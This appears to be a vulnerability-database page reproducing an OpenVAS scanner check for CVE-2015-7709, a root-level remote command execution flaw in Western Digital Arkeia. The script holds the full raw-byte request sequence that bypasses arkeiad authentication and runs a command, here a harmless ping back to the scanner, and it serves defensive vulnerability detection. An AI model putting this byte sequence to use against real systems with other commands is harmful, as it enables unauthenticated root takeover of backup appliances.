Lucene search

HistoryAug 16, 2016 - 12:00 a.m.

Western Digital Arkeia <= v11.0.12 RCE Vulnerability

2016-08-1600:00:00

plugins.openvas.org

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

7.2 High

AI Score

Confidence

Low

0.834 High

EPSS

Percentile

98.5%

JSON

The Western Digital Arkeia Appliance is affected by a remote
code execution (RCE) vulnerability.

# Copyright (C) 2016 Greenbone Networks GmbH
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

CPE = "cpe:/a:arkeia:western_digital_arkeia";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.107041");
  script_version("2022-12-13T10:10:56+0000");
  script_cve_id("CVE-2015-7709");

  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_tag(name:"last_modification", value:"2022-12-13 10:10:56 +0000 (Tue, 13 Dec 2022)");
  script_tag(name:"creation_date", value:"2016-08-16 13:16:06 +0200 (Tue, 16 Aug 2016)");

  script_name("Western Digital Arkeia <= v11.0.12 RCE Vulnerability");
  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
  script_family("General");
  script_dependencies("gb_arkeia_virtual_appliance_detect_617.nasl", "os_detection.nasl");
  script_mandatory_keys("ArkeiaAppliance/installed");
  script_require_ports("Services/arkeiad", 617);

  script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2015/Jul/54");

  script_tag(name:"summary", value:"The Western Digital Arkeia Appliance is affected by a remote
  code execution (RCE) vulnerability.");

  script_tag(name:"vuldetect", value:"Execute a command using the ARKFS_EXEC_CMD function.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year
  since the disclosure of this vulnerability. Likely none will be provided anymore. General solution
  options are to upgrade to a newer release, disable respective features, remove the product or
  replace the product by another one.");

  script_tag(name:"insight", value:"The insufficient checks on the authentication of all clients in
  arkeiad daemon can be bypassed.");

  script_tag(name:"affected", value:"Western Digital Arkeia 11.0.12 and below.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute
  arbitrary commands with root or SYSTEM privileges.");

  script_tag(name:"solution_type", value:"WillNotFix");
  script_tag(name:"qod_type", value:"remote_active");

  exit(0);
}

include("dump.inc");
include("host_details.inc");
include("os_func.inc");
include("misc_func.inc");

function arkeiad_recv( soc ) {

  r = recv( socket:soc, length:8 );

  if( ! r || strlen( r ) < 8 )
    return;

  len = ord( r[7] );
  if( ! len || len < 1 )
    return r;

  r += recv( socket:soc, length:len );
  return r;
}

if( ! port = get_app_port( cpe:CPE, service: "arkeiad" ) )
  exit( 0 );

if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
  exit( 0 );

soc = open_sock_tcp( port );
if ( ! soc )
  exit( 0 );

req = raw_string( 0x00, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70 ) +
      crap( data:raw_string( 0 ), length:12 ) +
      raw_string( 0xc0, 0xa8, 0x02, 0x8a ) +
      crap( data:raw_string( 0 ), length:56 ) +
      raw_string( 0x8a, 0x02, 0xa8 ) +
      raw_string( 0xc0, 0x41, 0x52, 0x4b, 0x46, 0x53 ) + # "ARKFS"
      raw_string( 0x00 ) +
      raw_string( 0x72, 0x6f, 0x6f, 0x74 ) + #"root"
      raw_string( 0x00 ) +
      raw_string( 0x72, 0x6f, 0x6f, 0x74 ) + #"root"
      crap( data:raw_string( 0 ), length:3 ) +
      raw_string( 0x34, 0x2e, 0x33, 0x2e, 0x30, 0x2d, 0x31 ) + #"4.3.0-1"
      crap( data:raw_string( 0 ), length:11 );
send( socket:soc, data:req );
res = arkeiad_recv( soc:soc );
if( ! res || raw_string( 0x00, 0x60, 0x00, 0x04 ) >!< res )
  exit( 0 );

req2 = raw_string( 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x32 ) +
       crap( data:raw_string( 0 ), length:11 );

send( socket:soc, data:req2 );
res2 = arkeiad_recv( soc:soc );
if( ! res2 || raw_string( 0x00, 0x60, 0x00, 0x04 ) >!< res2 )
  exit( 0 );

req3 = raw_string( 0x00, 0x61, 0x00, 0x04, 0x00, 0x01, 0x00, 0x1a,
                   0x00, 0x00, 0x31, 0x33, 0x39, 0x32, 0x37, 0x31,
                   0x32, 0x33, 0x39, 0x38, 0x00, 0x45, 0x4e ) +
       crap( data:raw_string( 0 ), length:11 );
send( socket:soc, data: req3);
res3 = arkeiad_recv( soc:soc );
if( ! res3 || raw_string( 0x00, 0x43, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00 ) >!< res3 )
  exit( 0 );

req4 = raw_string( 0x00, 0x62, 0x00, 0x01, 0x00, 0x02, 0x00, 0x1b,
                   0x41, 0x52, 0x4b, 0x46, 0x53, 0x5f, 0x45, 0x58,
                   0x45, 0x43, 0x5f, 0x43, 0x4d, 0x44, 0x00, 0x31 ) +
       crap( data:raw_string( 0 ), length:11 );
send( socket:soc, data:req4 );
res4 = arkeiad_recv( soc:soc );
if( ! res4 || raw_string( 0x00, 0x43, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00 ) >!< res4 )
  exit( 0 );

# Used to confirm the vulnerability
vtstrings = get_vt_strings();
vtcheck = vtstrings["ping_string"];

if( os_host_runs( "Windows") == "yes" ) {
  command = "ping -n 5 " + this_host();
  win = TRUE;
} else {
  command = "ping -c 5 -p " + hexstr( vtcheck ) + " " + this_host();
}

cmdlen = raw_string( strlen( command ) );

req5 = raw_string( 0x00, 0x63, 0x00, 0x04, 0x00, 0x03, 0x00, 0x15,
                   0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x30, 0x3a,
                   0x31, 0x2c ) +
       crap( data:raw_string( 0 ), length:12 ) +
       raw_string( 0x64, 0x00, 0x04, 0x00, 0x04, 0x00 ) +
       cmdlen +
       command +
       raw_string( 0x00 );

send( socket:soc, data:req5 );
for( i = 0; i < 3; i++ ) {

  res5 = send_capture( socket:soc, data:"", timeout:5,
                       pcap_filter:string( "icmp and icmp[0] = 8 and dst host ", this_host(), " and src host ", get_host_ip() ) );

  if( res5 && ( win || vtcheck >< res5 ) ) {
    close ( soc );
    report = 'By sending a special request it was possible to execute `' +  command + '` on the remote host\nReceived answer:\n\n' + hexdump(ddata:( res5 ) );
    security_message( port:port, data:report );
    exit( 0 );
  }
}

if( soc )
  close ( soc );

exit( 99 );

References

seclists.org/fulldisclosure/2015/Jul/54

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

7.2 High

AI Score

Confidence

Low

0.834 High

EPSS

Percentile

98.5%

JSON

Related for OPENVAS:1361412562310107041